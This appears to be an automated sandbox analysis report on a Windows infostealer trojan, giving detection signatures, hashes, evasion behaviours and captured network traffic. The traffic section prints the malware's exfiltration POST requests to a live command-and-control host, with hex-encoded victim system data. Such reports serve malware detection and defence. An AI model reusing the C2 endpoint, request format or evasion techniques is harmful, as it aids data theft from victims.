Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wlEp68Few5.exe

Overview

General Information

Sample name:wlEp68Few5.exe
renamed because original name is a hash value
Original sample name:8cd346fc831e7d59ebab0de045018b84.exe
Analysis ID:1578070
MD5:8cd346fc831e7d59ebab0de045018b84
SHA1:65ecbe74b5e512c9b00dbb0d041ac1f812f3cbb5
SHA256:ca2b0a34c077e6e81cde2626da1aca4de3f52190747d4f66636a0a8397e158c5
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wlEp68Few5.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\wlEp68Few5.exe" MD5: 8CD346FC831E7D59EBAB0DE045018B84)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: wlEp68Few5.exeAvira: detected
Antivirus detection for URL or domain
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=Avira URL Cloud: Label: malware
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963Avira URL Cloud: Label: malware
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1Avira URL Cloud: Label: malware
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: wlEp68Few5.exeVirustotal: Detection: 47%Perma Link
Source: wlEp68Few5.exeReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: wlEp68Few5.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0049DCF0
Source: wlEp68Few5.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_004DA5B0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_004DB560
Source: wlEp68Few5.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0047255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0047255D
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004729FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 501502Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 30 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox ViewIP Address: 194.87.47.113 194.87.47.113
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0053A8C0 recvfrom,0_2_0053A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 501502Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 30 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1
Source: wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963
Source: wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000003.1455516008.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455056831.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1461182211.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1454984926.00000000017E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: wlEp68Few5.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: wlEp68Few5.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: wlEp68Few5.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443

System Summary

barindex
PE file contains section with special chars
Source: wlEp68Few5.exeStatic PE information: section name:
Source: wlEp68Few5.exeStatic PE information: section name: .idata
Source: wlEp68Few5.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_3_01801DDE0_3_01801DDE
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004805B00_2_004805B0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00486FA00_2_00486FA0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004AF1000_2_004AF100
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0053B1800_2_0053B180
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007FE0300_2_007FE030
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_005400E00_2_005400E0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004D62100_2_004D6210
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0053C3200_2_0053C320
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007C44100_2_007C4410
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_005404200_2_00540420
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0047E6200_2_0047E620
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0053C7700_2_0053C770
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007D67300_2_007D6730
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004DA7F00_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007F47800_2_007F4780
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004849400_2_00484940
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0047A9600_2_0047A960
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0052C9000_2_0052C900
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00646AC00_2_00646AC0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0072AAC00_2_0072AAC0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00604B600_2_00604B60
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0072AB2C0_2_0072AB2C
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007E8BF00_2_007E8BF0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0047CBB00_2_0047CBB0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007FCC700_2_007FCC70
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007F4D400_2_007F4D40
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00630D800_2_00630D80
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007ECD800_2_007ECD80
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0078AE300_2_0078AE30
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00494F700_2_00494F70
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0053EF900_2_0053EF90
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00538F900_2_00538F90
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007C2F900_2_007C2F90
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004810E60_2_004810E6
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007DD4300_2_007DD430
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007E35B00_2_007E35B0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_008017800_2_00801780
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_005298800_2_00529880
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007C99200_2_007C9920
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007F3A700_2_007F3A70
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004B1BE00_2_004B1BE0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007E1BD00_2_007E1BD0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007D7CC00_2_007D7CC0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00729C800_2_00729C80
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00485DB00_2_00485DB0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00483ED00_2_00483ED0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_00495EB00_2_00495EB0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007F9FE00_2_007F9FE0
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_3_018024430_3_01802443
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_3_018031F60_3_018031F6
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 0048CCD0 appears 54 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 0064CBC0 appears 104 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 004775A0 appears 704 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 0048CD40 appears 80 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 00627220 appears 103 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 004B50A0 appears 101 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 004771E0 appears 47 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 0047CAA0 appears 61 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 004B4F40 appears 333 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 004773F0 appears 113 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 004B4FD0 appears 289 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 0047C960 appears 37 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 004B5340 appears 48 times
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: String function: 005544A0 appears 76 times
Source: wlEp68Few5.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: wlEp68Few5.exeStatic PE information: Section: vwhakcfb ZLIB complexity 0.9944798693086003
Source: wlEp68Few5.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0047255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0047255D
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004729FF
Source: C:\Users\user\Desktop\wlEp68Few5.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\wlEp68Few5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: wlEp68Few5.exeVirustotal: Detection: 47%
Source: wlEp68Few5.exeReversingLabs: Detection: 44%
Source: wlEp68Few5.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: wlEp68Few5.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: dhcpcsvc6.dllJump to behavior
